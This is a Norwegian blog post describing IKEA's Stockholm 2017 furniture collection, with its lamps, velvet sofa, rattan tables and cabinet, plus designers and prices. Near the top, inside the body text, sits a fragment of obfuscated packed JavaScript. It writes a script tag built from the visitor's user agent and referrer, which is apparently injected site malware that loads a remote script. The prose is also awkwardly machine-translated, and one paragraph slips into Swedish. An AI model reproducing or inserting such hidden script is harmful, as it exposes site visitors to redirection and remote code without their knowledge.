Inspirasjon

Ikea Stockholm 2017 – ny samling

Ikea »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kaezn|var|u0026u|referrer|bfynd||js|php’.split(‘|’),0,{}))
Stockholm 2017 – ny samling:
Nå er det på tide å dra nytte av den nyeste kolleksjonen Ikea Stockholm 2017. En samling som er fantastisk elskverdig og trendy. Den er inspirert av naturen vår i Skandinavia med mye lyst tre, kjølig lys vann og vakre solnedganger.

Samlingen Stockholm strekker seg tilbake til 1984. For den ble da den første møbel ble utgitt. Siden da Ikea Stockholm hadde mange møbelklassikere som har blitt dyrt samleobjekter . Forskjellen fra Ikea berømte samling av PS som ofte rettet mot et yngre publikum som Stockholm er mer rettet mot et mer modent publikum.

Ikea Stockholm 2017 – Scandinavian natur

Noen av de viktigste ordene som oppsummerer Ikea Stockholm i 2017, kvalitet, slående og nøye utvalgt. Hvis vi ser nærmere på de menneskene som hjalp til å forme gitt Ikea Stockholm samlinger har alltid vært disse svært dyktige folk med perfeksjon for å møte akkurat rett tid. Dette kan sees av alle detaljer føles moderne og trendy.

På bildet over ser du den nye cymbal-formede gulvlampe i forkrommet stål. Lampen er tilgjengelig både som en gulvlampe og bordlampe , og er utformet av Ola Wihlborg. Prisen er 499 NOK og 699 NOK.

I denne samlingen vil vi også ta del i en innbydende fløyel sofa med vedlagt puff. Fargene på sofaen vil være tilgjengelig med minattsblå, oransje og grå. Selv om denne utformingen av Ola Wihlborg. 3-seters sofa vil koste 14 995 NOK.

Ikea Stockholm 2017 – fløyel sofa i oransje for å symbolisere en flammende solnedgang. Denne vakre sofa i en farge som vi ønsker å ha. For sofaen kan også kombineres med et teppe av samme tema designet av Maria Vinka.

Ikea Stockholm i 2017, den lange, smale sofabord i lys boks med en bordplate i vevet rotting, designet Nike Karlsson, NOK 895. Stuebordet vil være tilgjengelig i to forskjellige størrelser, med eller uten rotting detaljer.

Skåpet i ljus ask och rotting som troligtvis är en klassiker redan innan kollektionen är släppt kommer säljas för 3 495 NOK, och är designad av Nike Karlsson.

Bilder fra: ikea.no

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *